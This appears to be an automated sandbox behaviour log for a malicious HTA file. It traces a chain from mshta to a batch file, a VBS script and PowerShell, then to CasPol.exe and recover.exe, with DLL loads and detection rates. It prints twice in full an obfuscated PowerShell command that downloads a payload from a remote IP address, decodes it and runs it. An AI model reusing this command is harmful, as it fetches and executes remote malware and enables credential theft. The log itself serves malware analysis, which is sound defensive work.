Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\kmbgnrgsd-N2XF5V
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Windows\Temp\anonymiser.bat

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\Sheena.vbs"

Source: C:\Windows\SysWOW64\recover.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 0000000A.00000002.1120527803.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: creatingbestthingsforhisbeststepstotakehim.hta	Virustotal: Detection: 23%
Source: creatingbestthingsforhisbeststepstotakehim.hta	ReversingLabs: Detection: 19%

Source: C:\Windows\SysWOW64\recover.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\creatingbestthingsforhisbeststepstotakehim.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\Sheena.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\vjynt"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\xllfutvz"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\Sheena.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\vjynt"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\xllfutvz"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
